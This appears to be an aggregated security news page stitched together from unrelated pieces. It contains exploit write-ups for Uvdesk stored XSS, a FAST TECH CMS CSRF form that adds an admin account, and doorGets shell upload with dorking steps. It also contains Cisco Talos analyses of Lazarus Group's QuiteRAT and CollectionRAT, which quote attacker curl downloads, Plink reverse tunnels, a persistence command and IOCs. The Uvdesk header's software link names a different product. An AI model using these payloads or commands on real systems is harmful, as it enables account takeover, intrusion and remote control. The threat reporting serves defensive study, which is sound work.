Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="subject"aaaa------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="to[]"test@local.host------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="reply"%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="pic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="nextView"stay------WebKitFormBoundaryXCjJcGbgZxZWLsSk-------------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Mon, 14 Aug 2023 11:33:26 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateLocation: /uvdesk/public/en/member/ticket/view/1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: bf1b73X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:33:26 GMTSet-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=laxConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 398<!DOCTYPE html><html>    <head>        <meta charset="UTF-8" />        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>    </head>    <body>        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.    </body></html>-----------------------------------------------------------------------------------------------------------------------Redirect and view response:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Mon, 14 Aug 2023 11:44:14 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29X-Powered-By: PHP/7.4.29Cache-Control: max-age=0, must-revalidate, privateAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET,POST,PUT,OPTIONSAccess-Control-Allow-Headers: Access-Control-Allow-OriginAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Headers: Content-TypeX-Debug-Token: 254ce8X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8X-Robots-Tag: noindexExpires: Mon, 14 Aug 2023 11:44:14 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 300607<!DOCTYPE html><html>    <head>        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>[...]<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>[...]-----------------------------------------------------------------------------------------------------------------------XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.

Uvdesk 1.1.4 Cross Site Scripting

FAST TECH CMS version 1.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : FAST TECH CMS v1.0 CSRF Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit)                                             |   
| # Vendor    : http://www.fasttechtechnologies.in/                                                                                |    
| # Dork      : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved.                             |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 5.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/add_new_user.php

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data">  
              <div class="form-group">  
          <label>Name</label>  
                    <input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>  
              </div>  
              <div class="form-group">  
          <label>User Name</label>  
                    <input type="text" class="form-control" id="username" name="username" placeholder="Enter User  Name ..." required>  
              </div>

                             <div class="form-group">  
          <label>Password</label>  
                    <input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>  
              </div>

                                           <div class="form-group">  
          <label>Confirm Password</label>  
                    <input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>  
              </div>

                                        <div class="form-group">  
                    <label>User Type</label>  
                    <select class="form-control" id="usertype" name="usertype" required>  
                      <option>Select Type</option>  
                      <option value="A">Administrator</option>  
                      <option value="R">Retail</option>

                                          </select>  
             </div>

                           <div class="form-group">  
          <label>Email-Id</label>  
                    <input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>  
              </div>

                            <div class="box-footer">  
                <button type="submit" class="btn btn-primary" name="submit">Submit</button>  
              </div>  
            </form>  
            </div>

                      </div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

FAST TECH CMS 1.0 Cross Site Request Forgery

doorGets CMS version 12 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : doorGets CMS v12 Unrestricted File Upload Vulnerability                                                            |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://doorgets.io/t/en/                                                                                          |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Register new user . http://127.0.0.1/bestwayschoolcom/dg-user/en/?controller=authentification&action=register

[+] Confirmation link in the email.

[+] After login go to manage your profile http://127.0.0.1/elimu7com/eXplored/dg-user/en/?controller=account 

[+] From paramaters Choose an HTML editor ( editor tinymce ) & press Save .

[+] Creat new Blog http://target_site/eXplored/dg-user/en/?controller=moduleblog&uri=blog&action=add

[+] insert your Ev!l .php2 .html .svg ...

[+] http://target_site/fileman/Uploads/

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

doorGets CMS 12 Shell Upload

Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.

Thursday, August 24, 2023 08:08

*   In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”  
    
*   CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.  
    
*   Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.  
    
*   One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.

**Lazarus Group reuses infrastructure in continuous assault on enterprises**

In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.

As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.

Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.

  
In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.

Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.

The connections between the various malware are depicted below:

**Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2**

CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.

CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.

Implant's configuration strings.

The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.

Initial check-in over HTTP to C2 server.

**CollectionRAT and its link to EarlyRAT**

Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.

Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT

Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.

**DeimosC2 analysis**

Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.

The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.

Configuration in the DeimosC2 implant.

Trend Micro has an excelelnt analysis of the DeimosC2, but the implants typically have various RAT capabilities such as:

*   Execute arbitrary commands on the endpoint.
*   Credential stealing and registry dumping.
*   Download and upload files from C2.
*   Shellcode execution.
*   Uninstallation of the implant.

**Malicious Plink**

Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:

pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.

However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:

*   The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:

Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] <Remote_IP>

*   A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.

A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.

The malicious Plink will also create a mutex named “Global\\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: **62248, 62253-62255.**

**IOCs**

IOCs for this research can also be found in our GitHub repository here.

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**CollectionRAT**

db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984

773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df  

**DeimosC2**

05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d  

**Trojanized Plink**

e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

109\[.\]248\[.\]150\[.\]13

108\[.\]61\[.\]186\[.\]55:443

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

hxxp\[://\]109\[.\]248\[.\]150\[.\]13/EsaFin\[.\]exe

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/boards/boardindex\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/editor/common/cmod

Lazarus Group's infrastructure reuse leads to discovery of new malware

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

Thursday, August 24, 2023 08:08

*   Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.  
    
*   In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.  
    
*   QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.  
    
*   Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

**Lazarus Group compromises internet backbone infrastructure company in Europe  
**

In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146\[.\]4\[.\]21\[.\]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command

Intent

C:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon

Get logon server name (machine name). System Information Discovery \[T1082\]

C:\\windows\\system32\\cmd.exe /c ipconfig | findstr Suffix

Domain name for the system. Domain discovery \[T1087/002\]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

**Lazarus Group evolves malicious arsenal with QuiteRAT**

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];...<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Configuration strings encoded in the malware.

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter names

Values

Description

mailid

<12 chars from MD4>

The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)

action

“inbox” = send check beacon  
“sent” = data is being sent to C2

Signifies the action being taken

body

<base64\_xorred\_data>

Data to be sent to C2.

param

<Internal/Local IP address>

The internal/LAN IP address of the infected endpoint.

session

<rand>

Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=inbox**&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=sent&body=<base64_xorred_data>**param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:  

Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name

Compile date

notify.exe (32bit)

May 30, 2022

acres.exe

July 22, 2022

acres.exe (64bit)

July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

**QuiteRAT vs MagicRAT**

QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our Github repository here.  

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.

Submitted by oretnom23 on Tuesday, March 14, 2023 - 15:32.

